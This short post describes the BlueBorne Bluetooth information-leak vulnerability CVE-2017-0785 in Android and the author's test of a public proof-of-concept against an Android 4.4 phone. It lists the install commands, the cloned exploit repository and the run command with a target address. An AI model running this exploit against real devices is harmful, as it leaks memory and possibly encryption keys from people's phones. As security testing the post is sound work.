CVE-2017-0785: BlueBorne PoC
Information Leak Vulnerability (CVE-2017-0785)
The first vulnerability in the Android operating system reveals valuable information which helps the attacker leverage one of the remote code execution vulnerabilities described below. The vulnerability was found in the SDP (Service Discovery Protocol) server, which enables the device to identify other Bluetooth services around it. The flaw allows the attacker to send a set of crafted requests to the server, causing it to disclose memory bits in response. These pieces of information can later be used by the attacker to overcome advanced security measures and take control over the device. This vulnerability can also allow an attacker to leak encryption keys from the targeted device and eavesdrop on Bluetooth communications, in an attack that very much resembles heartbleed.
Just ran a quick BlueBorne (https://github.com/ojasookert/CVE-2017-0785) PoC test against an Android 4.4 smartphone.
sudo apt-get install bluetooth libbluetooth-dev
sudo pip install pybluez
sudo pip install pwntools
git clone https://github.com/ojasookert/CVE-2017-0785.git
python CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX:XX
The stack gets dumped